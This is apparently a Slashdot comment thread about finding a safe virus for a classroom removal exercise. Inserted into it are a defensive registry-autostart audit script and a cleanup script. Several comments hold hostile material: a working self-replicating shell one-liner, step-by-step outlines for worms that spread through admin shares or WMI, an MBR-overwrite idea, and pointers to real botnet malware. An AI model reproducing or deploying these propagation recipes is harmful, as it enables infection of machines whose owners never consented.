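            data = _decode(m.group(2))
            if data is not None:
                yield key, name, data


def audit(text):
    """Return [(key, name, command, reasons)] for autostart entries worth review."""
    findings = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith(AUTOSTART_SUFFIXES):
            continue
        low, reasons = data.lower(), []
        if SCRIPT_RE.search(data):
            reasons.append("script file")
        if any(h in low for h in WRITABLE_HINTS):
            reasons.append("user-writable location")
        if reasons:
            findings.append((key, name, data, reasons))
    return findings


def startup_items(volume_root):
    """List files in the Startup folders of a mounted (offline) Windows volume."""
    root = Path(volume_root)
    hits = []
    for pattern in STARTUP_GLOBS:
        hits += [p for p in root.glob(pattern)
                 if p.is_file() and p.name.lower() != "desktop.ini"]
    return sorted(str(p.relative_to(root)) for p in hits)


if __name__ == "__main__":
    for key, name, data, reasons in audit(SAMPLE_REG):
        print(f"{key}\n  {name} = {data}\n  review: {', '.join(reasons)}")
```

regedit and `reg export` write version 5.00 files as UTF-16, so read a real export with `encoding="utf-16"` before passing the text to `audit`.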

  72. Re:DON'T DO IT! You'll get fired by Anonymous Coward · · Score: 0

    Wow, you have no reading comprehension, do you? Re-read his question. He wants a virus that HE can infect computers with. He is teaching virus removal, not virus writing.
    He says he already has an isolated lab just for this purpose.

    Perhaps you should learn to understand what you read before you post and make yourself look stupid.

  73. Re:DON'T DO IT! You'll get fired by hoggoth · · Score: 1

    Sure... he is teaching his computer newbs how to WRITE a virus in a 'demystify computers' class. And next period in health they will be designing the DNA of a retrovirus.

    --
    - For the complete works of Shakespeare: cat /dev/random (may take some time)
  74. I can't be the first to suggest it, but... by kenh · · Score: 0, Redundant

    Have you considered installing Windows?

    Seriously, there are 'fake' viruses that are used for testing - really just a block of code that matches a virus signature, have you considered one of those? For example: http://www.eicar.org/anti_virus_test_file.htm (as others have mentioned).

    --
    Ken
  75. Bad idea by FlyByPC · · Score: 3, Insightful

    This sort of thing is exactly what the "whatcouldpossiblygowrong" tag is for. I'm surprised it hasn't shown up yet...

    --
    Paleotechnologist and connoisseur of pretty shiny things.
  76. Maybe ask a clamav virus signature author... by mrflash818 · · Score: 3, Informative

    ...if they know of a good virus candidate?

    http://www.clamav.net/

    --
    Uh, Linux geek since 1999.
  77. Not a virus by microbee · · Score: 0

    This is not a virus. A real virus would replicate itself, which means when it detects a USB drive it copies itself onto the drive.

    If I were the professor you'd get a FAIL.

  78. Re:Simple by beav007 · · Score: 0, Troll

    Protip: Windows is not a virus, because virii by definition are self-replicating. Computers do not spontaneously break out in Windows.

    Windows fits better under the heading "malware" (or "crapware").

  79. Actual answer by dakkon1024 · · Score: 1

    Actual answer
    1) You should write this yourself
    2) How the virus is going to spread depends a lot on the lab you are working in. You best hard code the “infection” by name or ip.
    3) You will need some form of admin rights.
    4) Create Virus.
    5) Give it to your class.
    6) Infect PCs
    7) Somehow this will go horribly wrong.
    8) You will get fired.

  80. Re:DON'T DO IT! You'll get fired by Anonymous Coward · · Score: 2, Insightful

    He's planning to intentionally infect the school network with a virus as part of a lesson. Sounds like something you get fired for.

  81. Do you run SCADAs ? by Anonymous Coward · · Score: 0

    If so, the virus will come to you...

  82. lol Monkey.b ! memories.. by gearloos · · Score: 1

    This so reminds me of Monkey.B, which was a virus running rampant years ago on DOS machines. If you can get an old box, load DOS or Win95/98 on it, you can download Monkey.B and it will be easy to see. Just go to BIOS settings and your hard drive size CHS will all be changed. Simple removal as well.

    --
    "Computers are a lot like Air Conditioners" "They both work great until you start opening Windows"
  83. I'm not sure but you could probably make it easily by Anonymous Coward · · Score: 0

    Idk, but you could probably make something that has an animation and locks everything up or something.

  84. Easy by Anonymous Coward · · Score: 0

    Just install Windows.

  85. Does your institution need any more clueless instr by Anonymous Coward · · Score: 0

    Seriously. I'm available.

  86. Re:I suggest using a jpeg by Anonymous Coward · · Score: 0

    I know not to feed the trolls but that was fucking hilarious. That is all.

  87. write it yourself by jamesh · · Score: 2, Interesting

    Write it yourself. The fact that you would even consider this without thinking about the potential for it to be a serious Career Limiting Move means that it should be a fun ride :)

    Seriously though, install XP at some base service pack level - sp1 or sp2 might do, then connect it to the internet without any firewall. The viruses will find you.

    But you could have a bit more fun than that. Write an exe file that simply pops up a "if this was a virus you'd be pwn3d by now" message. Then pick one of the popular kids in the class (let's call her Jane Smith), and send an email around to your whole class from an anonymous hotmail account (or some service that allows sending exe files) with a subject of "Ha Ha. Look at what Jane Smith got up to last night." and include the exe file with a message "pics attached". Fail everyone who opens it. You'll probably still lose your job due to the idiots they put in power, but at least you'll have taught your class a lesson (the lesson being "if you're a teacher, it pays not to think for yourself".)

    You don't say what the age of your students is. If it's a university or TAFE level class you might get away with it, but you only have to offend one daddy's girl and it's all over.

  88. This might work by CobaltBlueDW · · Score: 1

    I believe this is the url of the last virus I obtained: www.opengl.org/documentation/red_book/

    I'm pretty sure it's a legitimate site, so the virus may have come from an ad, in which case there isn't a 100% chance that going to that site will work, but if it does that would be a good option. It delivered one of those obnoxious and ironic viruses that had pop-ups pretending to "detect a virus". It was a trojan, but it was easy to clean off by hand, it was an older virus, so all anti-virus software should find it, and the location the virus is linked to was shut down a long time ago, so it is low risk.

  89. Remove by hand? by Culture20 · · Score: 1

    Hand them an OS installation CD. Tell them how once a machine is owned, you don't know how far, so back up data and restart from scratch. Done.

  90. Virtual machines by Volkov137 · · Score: 1

    Just get VirtualBox on each of the machines, install Windows (don't bother activating, just take a snapshot after install), then start being very irresponsible and click on every banner ad you see. Also, see if anybody still uses Kazaa and start searching for...anything really.

  91. Safer approach by negatonium · · Score: 1

    This might be a bit safer way to go: Antivirus software is sometimes tricked with false positives. I don't know what virus scanner you have on your lab machines but you can do a web search and find legitimate, harmless software that will trigger a false alert for whatever you have. Download one of those and use that to demonstrate to your students.

    I assume since you say it's a 101 class that by "remove by hand" you mean by using an anti-virus program and not hacking the registry. If so, then a harmless program will work as well as a true virus/worm.

    I use McAfee and it alerts on a CD eject task bar tool I once had. It thinks it is a trojan joke program (I guess to make you think your CD drive is busted). That would make a fine demonstration and a good example of don't blindly download every "cool" program you see on the 'net.

  92. Re:DON'T DO IT! You'll get fired by Anonymous Coward · · Score: 0

    This is why we have 'lab' environments.

  93. Re:Simple by Anonymous Coward · · Score: 0

    "Protip: Windows is not a virus, because virii by definition are self-replicating. Computers do not spontaneously break out in Windows."

    Are you sure about that? Because I'm pretty sure computers broke out with the Windows flu back when Windows 95 hit, and it's only got worse since then.

    Oh, and just say "viruses." None of this "virii" bullshit, which is actually not correct anyway. Not to mention it sounds retarded.

  94. Re:DON'T DO IT! You'll get fired by Luke+has+no+name · · Score: 1

    >Let's not do an instructive simulation of a common computer anomaly, lest some tech-retarded administrator punish you for being a good teacher.

  95. Linux (I'm serious...) by Anonymous Coward · · Score: 0

    I know, I know--Linux is rarely targeted by viruses, though they do exist. But, I recall reading about a proof-of-concept virus that was, shock, designed for Linux. Want easy to remove? Ironically, this virus makes it easy to remove itself from all infected files by simply typing a command, such as "virusname --disinfect" or something like that. As for the name of this virus, unfortunately I can't remember, but someone else might.

    Of course, then again this might be *too* easy to remove if intending to teach people how to remove a typical Windows virus, but hey... you never gave any limits on ease of removal.

  96. Use some VMs in a virtual network by nedlohs · · Score: 1

    and please don't ever try and teach a medical class

  97. Create the virus yourself by Anonymous Coward · · Score: 0

    Ok let me understand this properly.
    You are teaching a class on computer viruses and you don't know how to create one yourself?

  98. MBR virus by pbaer · · Score: 1

    Create a virus that overwrites the MBR making the computer non-bootable.

    --
    There are 11 types of people, those who know unary and those who don't.
  99. Re:DON'T DO IT! You'll get fired by gringer · · Score: 3, Informative

    No where was it mentioned about creating one. Ever.... actually read the summary ffs.

    I think you may have missed this part of the summary:

    do I try to write one my self

    --
    Ask me about repetitive DNA
  100. Simple... by tompaulco · · Score: 1

    The answer is simple. Find the person in your class who is smarter than you (you should recognize him/her. You were that person when you were in school), and give him the chance to shine that the a-hole professor never gave you.

    --
    If you are not allowed to question your government then the government has answered your question.
  101. Re:DON'T DO IT! You'll get fired by Delarth799 · · Score: 2, Informative

    He wants to infect some computers in a lab, that's why the virus can't be one that spreads to other computers so he doesn't infect the whole damn network. Now sure the best thing to do would be set up some computers on just a local LAN that doesn't have any access to the school network but that might not be an option.

  102. back orifice 2000 is pretty simple by Anonymous Coward · · Score: 0

    back orifice 2000 was pretty simple to infect and remove... you could give that a go.
    website here
    http://www.bo2k.com/

    last supported OS was windows xp, not sure on vista or 7

  103. Re:DON'T DO IT! You'll get fired by Aranykai · · Score: 1

    Not illustrate, demonstrate. Which, while I don't share the extreme views of the GP, I think is likely to come back to bite you. These people don't know what a script is, showing them a "pseudo-virus" isn't going to substantially enlighten them, nor enhance their lives in any meaningful way. Move on to useful things and spend more time on those.

    --
    If sharing a song makes you a pirate, what do I have to share to be a ninja?
  104. Core Wars by meburke · · Score: 1

    Cripe I'm old. I remember when writing a worm was an AI project. I also remember when air was clean and sex was dirty. It was all a long time ago...

    Give them something entertaining and instructive to do: Introduce them to Core Wars. Modern viruses have little or nothing in common with EICAR any more. You could introduce almost all the concepts of a Comp 101 class through good Core Wars competition.

    --
    "The mind works quicker than you think!"
    1. Re:Core Wars by k2r · · Score: 1

      Wow, I guess I didn't think of Core Wars within this millennium, yet.
      I have something fine to play with during the holidays.
      Thank you very much!

  105. siemns by ltcdata · · Score: 1

    1: Install a Siemens PLC in computers 2: connect the network to the internet 3: wait for Stuxnet to infect 4: profit??

  106. SM177Y by Anonymous Coward · · Score: 0

    Install spyfalcon. It will spread through the entire network. Gotta love them rogue virus' :P

  107. a single exe would be easy to remove by Anonymous Coward · · Score: 0

    google netbus

  108. Re:DON'T DO IT! You'll get fired by axismundi · · Score: 2, Interesting

    I wrote a virus in middle school (Windows 3.1 and DOS) which I showed to a friend, who infected some girl's computer. Turns out her computer belonged to her dad's small business. The ensuing shit-show of confused administrations, criminal charges, civil threats and pissed parents ended with a restraining order on ME and apparently some trouble for the "exploratory program" administrator, who at some point allowed me to use a computer, though it was most certainly not in any way involved with my extracurricular activities. Never underestimate the ability of an organization such as a school to dish out punishment on the wrong people. I agree with the parent poster, steer clear.

  109. Re:DON'T DO IT! You'll get fired by Reteo+Varala · · Score: 1

    I think you may have missed this part of the summary:

    do I try to write one my self

    Keep in mind, he's trying to find a way to get the isolated network infected so the students can learn about removal. One of the options available, to those who are skilled enough, is to write one. Even in that sentence, I do not see any hint of a plan to let the students try to write one, or even see the source code to the theoretical virus. He simply wants a relatively harmless virus to use for the purpose of teaching how to deal with them. I believe some can be found at http://offensivecomputing.net/ although you need to register before you'll be able to get any.

  110. Yes, please read. by meerling · · Score: 0, Redundant

    What you want is called EICAR, it's known as a test virus.
    It's not an actual virus, but antivirus programs will detect it as one, that's what its purpose is.
    EICAR doesn't actually do anything, so nothing is at risk.

    Now as to the warning:
    DO NOT UNDER ANY CIRCUMSTANCES USE A REAL VIRUS!!!! IT WILL GET LOOSE AND CAUSE PROBLEMS IF YOU DO!

    You're dealing with noobs, and even if you weren't, it would still get out and cause problems, and that's assuming that you aren't someplace that would consider you liable, or worse, in possible violation of law for intentionally infecting computers.

    Is all that alarmist? No, I've actually done a lot of work with viruses and their removal, and that includes work in an actual virus lab with real viruses. The only way to virtually guarantee a safe situation is a blackbox room. Nothing electronic goes in or out. No usb devices, no computers, no disks, no wireless, no network connections, no psps, no digital cameras, absolutely nothing. I don't think the school would be willing to pay for something like that, and to be honest, I don't think it'll work with computer 101 students as they just wouldn't understand.
    You have no idea how many "isolated computers that nobody has access to so it absolutely can't be infected" are actually infected. It only takes one mistake, unknowingly or otherwise.

    So just use EICAR and give your students a thrill without any risk on your part. It's better for everyone. After all, if you were teaching gun safety to some kids that have never seen a gun before, would you hand them loaded uzis?

  111. Virus by Dthief · · Score: 1

    just have all your students look at porn on the computers for 1 day's lesson, then the next day the computers will all be well infected

    --
    www.RacquetUp.org - Helping Detroit Youth
  112. Definition of terms by spidr_mnky · · Score: 1

    There's a lot of nitpicking about what is or is not technically a virus. The common use is to mean any piece of software that is malicious, but I assume you want something specifically benign. So, that leaves the question of what "type of virus" you want to emulate.

    I saw someone mention demonstrating the autorun feature with a program that installs itself and sets autorun. This could give an opportunity to demonstrate how to delist such processes from the startup routine.

    Do you want something that spreads? That could be thin ice, as well as being more difficult to do yourself, since it would need to take advantage of a vulnerability or misconfiguration.

    You might find something they'll enjoy, like a game, and piggyback a do-nothing "trojan" with it. Give it to a kid you can count on to play it during class, as well as share it with his friends, and tell him not to play it during class. The payload of the trojan should execute during class a few days later. Maybe just pop up a dialogue every 30 seconds indicating the "infected" state, or maybe something with a little more pizazz,like setting a jolly roger desktop background. Then (after making a note of who ended up "infected") you can start the lesson on security, trusting executables, autorun, startup processes, etc.

    The kids might (or might not) think you're cool because you wrote a virus, but as has been mentioned, higher ups might not. I would keep the phrase "It's not really a virus" on my lips the whole day.

  113. DETER Testbed by youngcho · · Score: 1

    You should look into using DETER Testbed for this type of class. http://www.isi.edu/deter/ In short, DETER is an Emulab clone for Network Security type of experiments. There is an on-going effort to promote DETER for education purpose and the DETER team has access to several types of virus. https://education.deterlab.net/ Hope this helps. Young

  114. I wrote something that might help... by loosescrews · · Score: 1

    I wrote this a few years ago. It is pretty evil, but does not cause any permanent damage to a computer. All it does is add a shortcut to the remote reboot command to the startup so when a user is logged on, the computer reboots. It can be easily removed with msconfig in safe mode. The cool thing is that most Anti-Virus programs ignore it.

    You can download it here, and the removal tool here. I even made an iso that when inserted into a computer with autorun enabled, silently installs the program. The exe's were made with NSIS.

  115. A simple buffer overflow ought to do it. by AllergicToMilk · · Score: 1

    Why not teach a simple buffer overflow exploit? A simple bit of C code with a scanf into a fixed length character array is your starting point. Have them craft a string to input that overflows the buffer and does something identifiable.

    --
    There are only 6,863,795,529 types of people in the world.
  116. honeynet project challenges by NicenessHimself · · Score: 1

    The excellent honeynet project has some exciting challenges - examples of viruses and hacking in the wild, well packaged. The old 'Forensic challenge' is perhaps the most exciting for students to do: http://old.honeynet.org/challenge/index.html

    1. Re:honeynet project challenges by NicenessHimself · · Score: 1

      and the honeynet project's new website with newest challenges is at http://www.honeynet.org/ strange that they have an old and a new site, with no links from the old site going to the new site... but an excellent project anyway! everyone should go enter their new challenges

  117. Re:How about... by phyrexianshaw.ca · · Score: 1

    you ever worked in the education system?

    the itinerary for ANY level of education all the way from grade four to a doctorate course in a university for computer sciences:

    1) Computer Sciences.
    1.a) Microsoft Windows. (if funding was provided by MS.)
    1.b) Unix security
    2) Programming
    3) Keyboarding

    and that's honestly about it. on a sheet of paper, with the school's letterhead at the top. if you're LUCKY, they might have what has been taught there for the last several years.

    teachers today have almost complete control over what they teach, in most districts.

  118. Not simple, but widespread and easily obtainable by Anonymous Coward · · Score: 0
  119. From my 2 years as a HS lab monitor by GodfatherofSoul · · Score: 1

    I consider this a pretty bad idea. A terrible idea. I commend your efforts to think outside the box, but anything you give or show these kids is bound to show up somewhere it shouldn't be. It's been my experience that study at this level of security is in the purview of much more advanced students who can truly understand what the code is doing and handle the responsibility of that knowledge. Your students will gain much more from a focus on productive coding rather than exploits. That's not to say that there isn't the oddball guru in your class or among this article's Slashdot readers who could handle it without a hitch. But, at their level the cost/benefit just isn't worth it.

    --
    I swear to God...I swear to God! That is NOT how you treat your human!
  120. Metasploit by Anonymous Coward · · Score: 0

    You could use Metasploit: it's not a virus strictly speaking, but it is a framework to research exploits. With an unpatched Windows XP machine, it could be useful in such a course. You could at least use it to teach the "how do i get malicious code to execute" part.

  121. What could possibly go wrong? by pr100 · · Score: 1

    You want to teach a bunch of kids how to make computer viruses? :)

  122. write a shellscript by k2r · · Score: 1

    if you really want to demonstrate something self-propagating, write a shellscript that uses ssh with a special user and public-key authorization to copy itself to remote machines.
    Generate a ssh-key just for this purpose and copy it to the target-machines.
    It's more a trojan than a virus, but don't feel tempted to make it more stealthy (naming it 'ls', changing target's $PATH), that's too dangerous.

    And before this, if you are in the US, talk to your lawyer and check brainless zero-tolerance-policies that might be applied to you.

  123. Symantec trial version by Anonymous Coward · · Score: 0

    That will give them a challenge..... Oh, wait you said easy to remove, My Bad!

  124. NetBunny by macmurph · · Score: 1

    About 17 years ago we had a hack called NetBunny that would send the energizer bunny from one lab computer to the next. It ran on classic MacOS. Apparently it was updated to 'NetBunny 2 1/2'.

    An OS X port came out called NetBunnyX.

    Now I can't find much info on it. But it definitely had the feeling of innocent, kid friendly malware.

  125. What I would like is a safe site to demo fake AV by maxwells_deamon · · Score: 1

    I would like a site on the web that would act as a fake AV site. Like the ones when you browse to it pops up a message that you are infected....

    I could probably set something like this but if it became popular people would try to convert it to the real thing and I do not have the time to monitor that juicy of a target.

  126. Re:DON'T DO IT! You'll get fired by L4t3r4lu5 · · Score: 4, Informative

    Yes, because he wants to make sure the "fake" virus he uses for the removal exercise doesn't contain some hidden, actually damaging, payload.

    Someone has already suggested the EICAR test file, which is ideal. It pops up a message box, and is easy to remove. He can add links to the various windows startup files, the registry, he can go old school and call it from a batch file, and he's safe in the knowledge that he's in no danger of hosing his systems.

    Nowhere in the stub did he say he was going to teach the kids about actually writing the virus they were to remove. Reading comprehension fail.

    --
    Finally had enough. Come see us over at https://soylentnews.org/
  127. Re:DON'T DO IT! You'll get fired by Anonymous Coward · · Score: 0

    Bah!

    I was creating test viri (is that the plural?) when I was 18 to see if I know enough about x86 ASM. Although I will admit that I did not infect more than 2 or 3 computers since I was not out to cause harm.

    Those were the days ...

    Now get off my freaking lawn!

  128. Source Code Virus by n01 · · Score: 1

    I recommend you find some source code virus, one that finds a source file and copies itself into the source file... While it has to rely on somebody compiling the source in order to spread (if it is written in a compiled language), this is easier to understand and analyze (and remove!) than a "binary virus"

  129. rbot or conficker by thrko · · Score: 1

    I can give you a copy of rbot, that I used in a basics of malware analysis workshop. It connects to the botnet (irc server, domain name under your control), where it receives further instructions from botmaster (scan, ddos attack, upgrade, etc.). The bot itself isn't very sophisticated, no rootkit protection, just copies itself in system folder and makes an autorun entry in registry. Other option is A or B variant of conficker, you can get it on http://www.offensivecomputing.net./ Once you understand how it hides itself, it's quite easy to find it and disable it.

  130. how to write teh virus??? by rve · · Score: 4, Interesting

    On any tech forum, including slashdot, you have wannabe haxx0rz who ask "how to write teh virus???" They never get a serious answer, obviously.

    The OP (ed1023) thinks he can trick slashdot readers with some social engineering into thinking they're really helping someone this time by telling him "how to write teh virus???". Who knows, maybe he will succeed. Maybe he will write teh virus.

  131. This is the way I would do it by ancient_kings · · Score: 1

    I'll assume your school has Windoze installed on the lab computers:

    1) Leave your computers on the network to keep your virus updating software up to date. Why? Because students are going to place in USB drives/devices/etc that may be ALREADY infected. Trust me on this.
    2) Make sure the students' accounts are NOT administrative accounts
    3) Install a free virtual PC system, like Sun's VirtualBox
    4) Install Windows98 in the VirtualBox system.
    5) Look for a virus that existed BEFORE 2002. Some current viri can actually penetrate Virtual Machines (VMs), and if you think you are a smart pants and install a VM inside a VM, these viri can penetrate right to the main, "real" OS. Viri before 2002 are very likely unaware of VMs. You can get the virus list from Norton's (Symantec's) websites.
    6) Now the tricky part. Finding the original virus source from a "reputable" website. :)
    7) Copy source into VM, compile and run.
    8) Have fun!

  132. not an executable, but useful for explaination ? by Anonymous Coward · · Score: 0

    https://www.cs.bris.ac.uk/home/page/teaching/wics/chap_virus.pdf

  133. Virtual Machine + Live malware = good demo by Anonymous Coward · · Score: 0

    You could just get a live one off offensivecomputing.net and infect a virtual machine. Just make sure to not connect the vm to a physical network if ur working with worms.

  134. easy task by Anonymous Coward · · Score: 0

    Assume you have write permissions to the all users dir, then write code that copies itself there.

    Assume you have admin rights on all machines, do an arp lookup to find all machines on the network, and copy the virus itself to
    \\machine\c$\Documents and Settings\All Users\Start Menu\Programs\Startup

    The virus needs to initially sleep for x seconds (until interesting info is in arp cache) before it spreads.

    You can also use the machine names of remote mounted shares.

    If you want AV to detect it, include the EICAR virus in the file.

    Should be easy to code in the not so good Perl clone Powershell

  135. try vbs by Anonymous Coward · · Score: 0

    how about some vbs virus ?

    If you're running Windows,
    1) retrieve PC names in network neighborhood (or through active directory)
    2) copy itself to start run menu
    3) print an annoying popup
    4) try to launch remotely on a random pc ( through wmi remote execution )
    5) goto 1

    if you go from 1 to 5 find the code for these small pieces through google there are so many websites about doing administrative tasks through vbs
    i don't include the code itself, don't want to cause trouble.

    As an alternative if you don't like to code; buy a SIEMENS PCL management unit, together with stux.net. :)

  136. Erm... You're at a school, right? by Anonymous Coward · · Score: 0

    Best bet, copy something onto a USB stick from one of the school computers. Plug it into a machine that hasn't been used by a child and has decent anti virus on it.

    I can pretty much guarantee you'll get something

  137. Blind leading the blind by Anonymous Coward · · Score: 0

    Why are you teaching Computer Science when you obviously don't know what you mean by a virus?
    Don't our students deserve better?

  138. Don't even think about it by Confused · · Score: 1

    Don't even think about doing this, there are many worthier subjects to demystify. You should stay away from this project not out of moral reason, but out of practical reasons.

    Remember that teacher who gave the terror planning assignment recently? I think it was a very instructive idea, but he caught a lot of flak for it. Writing a virus is similar. Even if it has pedagogic merits, it looks really bad for you from the outside and it's very easy to condemn you for it. The risk isn't worth it.

    On a technical side, writing a virus becomes very quickly very technical. You have to mess around with executable formats, hooking into loading procedures and many other internals of the target system. Add to that the whole mess of payload, how to exploit systems etc. Those things are very boring and obscure to students who don't have some advanced understanding of the operating system. You're going to lose your students very quickly or spend an enormous amount of time to explain the basics for little gain. Better use the available time on better projects.

    A virus is hard to contain. In the dark age of PC computing, a few virus escaped from lab settings exactly how you described them and became very widespread. Also, tracking how infection works isn't that easy either.

    On the other hand, if your lab has proper security your virus might not make it far at all and fizzle at the first hurdle. Not very instructive either.

    All in all this brings me to the conclusion that your idea has more shortcomings than merits. If you want to have a project about computer security and malware, consider doing some network traffic snooping with Wireshark and what that stuff means. Looking at http packages compared with https, password logging, one time password systems with tokens, PIN-code skimming, password strength, brute force attacks, etc. Add in a little data mining, social engineering and you're quickly in the domain of spooks and spies, but you still can safely declare it as instruction about security and privacy. There's a lot of immediate hands-on there which even your grand-mother understands.

  139. Why the do-it-yourself approach? by Anonymous Coward · · Score: 0

    You know, you could just ask a commercial anti-virus vendor if they'd send someone to your school, or give you and your students a tour of their lab. I'm sure you'll find one willing to do that if you try hard enough.
    You might even end up with free promo CD-ROMs of their product for your students. :-)

  140. Maybe a Modified Kentucky Virus by phreed · · Score: 1

    It is meant to be a joke but it has many of the properties of a "real" virus.
    - social engineering
    - exploits a system's weakness
    - can be tailored to have numerous side effects
    - propagation/growth

    It has the benefit of being easy to remove and being practically impossible to constitute a fireable offence. So, here it is in its entirety (I have modified it slightly as the original had a bug (deleted all files before forwarding ;-))...

    You have just received the ' Virus' As we ain't got no programming experience, this virus works on the honor system. Please forward this virus to everyone on your mailing list. When that is completed delete all files from your hard disk. Thank you for your cooperation. School of hard knocks. Computer Engineering Dept.

  141. Re:Simple by JasperHW · · Score: 1

    That's weird, I manage 1000 workstations (600/400 PC vs Mac), 10 X Servs (as they're generally called), 20 Linux (RHEL), and 100 windows. Macs, hands down, are the single biggest use of my help desk techs' and network admins' time. We've even had about 20-30 people switch from windows to mac because it's "what they prefer." Typically, that lasts less than a week before they come crying back for a PC (though to be fair, one stayed). If I could get rid of all of the workstations (since as far as I've seen there is *nothing* they can do that a PC can't), my expenses would DROP. So I guess my anecdotal experience of Macs as the WWOS counteracts yours.

  142. hard to find these days.. by spiffmastercow · · Score: 1

    True viruses are few and far between in this day and age. A true virus must a.) be able to attach itself to any other executable, and b.) propagate itself to other executables. Most malware these days is spread using a trojan as an attack vector. The closest to a real virus that you're likely to find is the occasional worm that replicates via a remote exploit, but those are also fairly uncommon these days.

  143. Virus? by iONiUM · · Score: 1

    Ebola. That'll teach 'em.

  144. VirtualBox and a virus creation tool by cHALiTO · · Score: 1

    Well, for starters, I'd install virtualbox and do all the work on a fresh install of windows running on it. Then you can take your pick of virus. I guess a very small non destructive old one would be best, especially if the source code is available (though that might be overkill if you just want them to get an idea of how viruses work..)
    I was thinking of the 'stoned' virus.. then I remembered there was an app back in the day, for DOS, that would let you create your own virus.. you'd select some options like stealth capabilities, file or disk deletion, printing a message, etc. Then the program would generate a virus, both in compiled .com and asm source code.
    It was called NuKE, but I'm sure there's more like that one.

    here's a link from google (I couldn't verify it since my work's proxy is blocking the site):

    This is a very old app, so I'm not sure it'll work on winXP or newer OSs but it might be worth a try.

    Good luck!

    --
    "Luck is my middle name," said Rincewind, indistinctly. "Mind you, my first name is Bad." -- Terry Pratchett
  145. Tell them to bring their parent's memory sticks by kikito · · Score: 1

    Chances are that 20% of them are infected with some crap. Just use an antivirus on them. Maybe (if it is a free antivirus) copy the antivirus installer on them, so they can bring it home.

  146. Here's an easy one by FauxPasIII · · Score: 1

    Reasonably safe, gets the point across:

    #!/bin/bash
    for file in *.sh ; do if ! grep -q fo0z $file ; then grep fo0z $0 >> $file ; fi ; done

    --
    25% Funny, 25% Insightful, 25% Informative, 25% Troll
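
The removal side of the script in comment 146, as an added example that is not part of any poster's comment: every file that script touches ends up with a line containing the marker `fo0z`, so finding and stripping that line is the whole cleanup. The function names and the sample files are assumptions made up for this example, and the "infected" sample uses an inert stand-in comment line rather than the real appended line.

```shell
#!/bin/bash
# Added example: find and clean *.sh files carrying the "fo0z" marker line.
# Function names are hypothetical; sample files are constructed for the demo.

MARKER='fo0z'   # marker string taken from the script in comment 146

# list_infected DIR: print each *.sh file in DIR that contains the marker.
list_infected() {
    local f
    for f in "$1"/*.sh; do
        [ -f "$f" ] || continue          # unmatched glob or non-regular file
        if grep -q -- "$MARKER" "$f"; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# clean_file FILE: keep a copy as FILE.infected, then drop every marker line.
# The file is rewritten in place so its mode and ownership are preserved.
clean_file() {
    local f tmp
    f=$1
    tmp=$(mktemp "${f}.XXXXXX") || return 1
    cp -p -- "$f" "${f}.infected" || { rm -f "$tmp"; return 1; }
    # grep -v exits 1 when nothing is left to print; only exit 2 is an error.
    grep -v -- "$MARKER" "$f" > "$tmp" || [ "$?" -eq 1 ] || { rm -f "$tmp"; return 1; }
    cat "$tmp" > "$f"
    rm -f "$tmp"
}

# scan_and_clean DIR: clean every flagged file, print how many were cleaned.
scan_and_clean() {
    local f n
    n=0
    for f in "$1"/*.sh; do
        [ -f "$f" ] || continue
        if grep -q -- "$MARKER" "$f"; then
            clean_file "$f" && n=$((n + 1))
        fi
    done
    printf '%s\n' "$n"
}

# make_lab: build a throwaway directory with constructed sample scripts
# (one clean, one carrying an inert marker line) and print its path.
make_lab() {
    local lab
    lab=$(mktemp -d) || return 1
    printf '#!/bin/bash\necho "backup job"\n' > "$lab/clean.sh"
    printf '#!/bin/bash\necho "report job"\n# %s constructed stand-in for the appended line\n' \
        "$MARKER" > "$lab/infected.sh"
    chmod 755 "$lab/infected.sh"
    printf '%s\n' "$lab"
}

# Stand-alone use: pass a directory to clean it, e.g. ./clean_fo0z.sh ~/lab
if [ "$#" -gt 0 ]; then
    list_infected "$1"
    echo "cleaned: $(scan_and_clean "$1")"
fi
```

Any legitimate line that happens to contain the marker string is removed as well, which is why each file is copied to `FILE.infected` before it is rewritten.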
  147. Comments by edp · · Score: 1

    As others have noted, spreading a virus and teaching others to spread a virus is dangerous, even if the virus is "benign." If the virus spreads to the system of any person who did not consent, you have committed an unethical and possibly unlawful act.

    That said, it is necessary to learn and to teach. If you have responsible students who have agreed to take proper precautions, it may be permissible to perform certain exercises with viruses. However, while you can get ideas from Slashdot, you should not accept advice. You should verify the ideas independently with professionals in computer security.

    I am not one, but one idea is to take some ideas from the methods used to prevent biological organisms from spreading while experimenting on those. For example, design the virus to spread only to systems that contain a special marker, such as a file in a known location that contains the text "This system is part of the equipment for course 123 in the Fall 2012 semester." This would prevent the virus from spreading to other systems even if a network connection were made or somebody moved a disk from your isolated systems to a networked system. It would not, of course, stop one of your students from disabling that part of the virus and making themselves a fun "toy" to play with, which is why you need to ensure your students are trustworthy.

  148. Re:How about... by Anonymous Coward · · Score: 0

    Er, did you even read the damn post?

    Here, let me help you out with the first four fucking words:

    Currently I am teaching...

    Hi!
    I'm from AT&T! Can you please let me in to check the wires?

  149. They probably already know... by rgallagher01 · · Score: 1

    Just have your students surf on the computers without A/V for about 15-20 minutes, guaranteed that they will all be infected. Then just do a little research and have them run some malware removal programs, have them go through the registry and see if they can find the specific keys that they were told the viruses created when they were doing the research on what they had become infected with. Most of the students are probably experienced with viruses and that most of them are really just programs that stupid people install.

  150. Pirate Windows XP by DarthVain · · Score: 1

    Pirate Windows XP. Connect to internet over night. Unplug in morning. Done. Have fun.

    P.S. Kids might want to take a sex ed class first for all the pop ups that are sure to come.

    As for how to fix. Format hard drive. Install new OS. Done. Reconnect to Internet.

    Can also be instructive as to why not to Pirate OS (or at least not XP).

  151. Re:Simple by after.fallout.34t98e · · Score: 1

    That might not mean your mac systems are worse, just that the users of them are more noisy. 10% of our users are using OSX, but 60% of the complaints in company come from them. I (am not in the IT dept) personally know of dozens of problems in the windows side that are never reported; these users sit there and pretend the problem isn't there. These are common issues too, like accidentally deleting a folder on the start menu, so that the only way they can run a program is from their desktop, or losing the formatting toolbar in word 2003 and not knowing how to put it back (one particular user has 2 documents open at all times, one that she copies text from and the one she is working on; whenever she needs to bold text or put in a title, she copies and pastes it from the old document; she wouldn't know how to create some formatting that wasn't already in a document she has somewhere). These people will just sit it out until the next upgrade cycle. That is when they get a "new" computer which IT reset to company settings.

    We aren't talking about computer savvy people here, we are talking about the general workforce over 30 right now. In my experience the difference between the windows users and the mac users are that the mac users complain more. The users have just as many problems on macs as they do on windows, but the mac users tend not to put up with it.

  152. Teach exploits not exploiters by SWiTlik · · Score: 1

